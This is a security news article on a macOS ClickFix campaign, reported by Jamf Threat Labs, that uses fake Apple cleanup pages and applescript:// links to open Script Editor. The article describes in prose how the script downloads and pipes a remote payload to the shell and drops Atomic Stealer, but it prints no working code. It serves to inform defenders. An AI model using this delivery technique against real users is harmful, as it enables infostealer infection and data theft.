macOS Malware Evolves: ClickFix Attack Chain Shifts from Terminal to Script Editor to Bypass Apple Defenses

A newly observed macOS malware campaign is signaling a tactical shift in how attackers deliver infostealers, quietly abandoning the Terminal in favor of a less scrutinized native tool. Researchers at Jamf Threat Labs have identified a variant of the widely used ClickFix social engineering technique that leverages Script Editor, opening a new path to execute malicious code while sidestepping recent Apple protections.

A Familiar Trick, Rewired for macOS

ClickFix campaigns have historically relied on a simple but effective tactic: trick users into copying and pasting commands into the Terminal under the guise of fixing system issues. Apple’s recent updates, including enhanced scanning of pasted Terminal commands, were designed to disrupt exactly this behavior.

This latest campaign adapts quickly. Instead of guiding users into Terminal, attackers now redirect execution into Script Editor using a browser-triggered workflow. The shift may seem minor, but it removes a key friction point that Apple introduced and reopens a pathway for user-assisted execution.

Fake Apple Pages and a Seamless Execution Flow

The attack begins with a convincing phishing page styled to resemble official Apple guidance. Users are told they can “reclaim disk space on your Mac,” complete with step-by-step instructions that mimic legitimate system cleanup processes.

When users click an “Execute” button, the site triggers an applescript:// URL scheme. This prompts the browser to open Script Editor with a preloaded script. Instead of manually entering commands, victims are presented with a ready-to-run script that appears benign.

This design reduces user hesitation and increases the likelihood of execution. The interaction feels more like a guided system utility than a suspicious command-line operation.

Obfuscation and Fileless Execution

Once executed, the script runs a heavily obfuscated command that follows a now-familiar malware pattern:

• A disguised string is decoded into a remote URL at runtime

• A payload is fetched using curl, with TLS verification disabled

• The downloaded code is piped directly into the shell for execution

This approach avoids writing the initial payload to disk, making detection more difficult for traditional security tools.

The first-stage script then unpacks a second-stage payload using encoded and compressed data. This leads to the retrieval of a Mach-O binary, which is dropped into a temporary directory, stripped of security flags, and executed.

Researchers identified the final payload as a variant of Atomic Stealer, a known infostealer targeting macOS systems.

Why Script Editor Matters

Script Editor is not a new tool in the macOS malware playbook, but its integration into a ClickFix-style campaign is notable. By shifting execution away from Terminal, attackers are effectively bypassing a control Apple specifically introduced to combat this type of social engineering.

The technique also exploits user trust. Script Editor is a native macOS application, and its interface does not immediately signal danger to most users. Combined with a polished phishing page, the attack chain becomes harder to distinguish from legitimate activity.

Apple’s Incremental Defenses, Attackers’ Rapid Iteration

Newer versions of macOS introduce additional prompts when opening and executing scripts from unknown sources. These warnings add friction, but they still rely on user judgment. As seen in this campaign, attackers continue to design workflows that minimize suspicion and streamline user interaction.

This ongoing cycle highlights a broader reality in cybersecurity. Defensive improvements often trigger rapid adaptation from threat actors, who look for alternative paths that achieve the same outcome with minimal resistance.

What This Means for macOS Security

The emergence of Script Editor-based ClickFix attacks underscores a growing trend in macOS threats:

• Social engineering remains a primary entry point

• Native tools are increasingly abused to evade detection

• Fileless and staged payload delivery continues to rise

• Security controls focused on one vector can be bypassed through adjacent system components

For enterprises and managed service providers, this reinforces the need for behavioral detection alongside traditional signature-based defenses. Monitoring unusual application launches, suspicious URL scheme usage, and script execution patterns will be critical in identifying these evolving threats.

The Bigger Picture

This campaign is not a radical reinvention of malware delivery, but it is a precise adjustment with outsized impact. By swapping Terminal for Script Editor, attackers preserve the effectiveness of ClickFix while neutralizing recent safeguards.

It is a reminder that in modern cybersecurity, small changes in technique can significantly alter the defensive landscape. As platform vendors tighten controls, adversaries will continue probing for overlooked pathways, often hiding in plain sight within trusted system tools.

Jamf Threat Labs continues to track this activity and related infrastructure, signaling that this technique may soon become more widespread across macOS-targeted campaigns.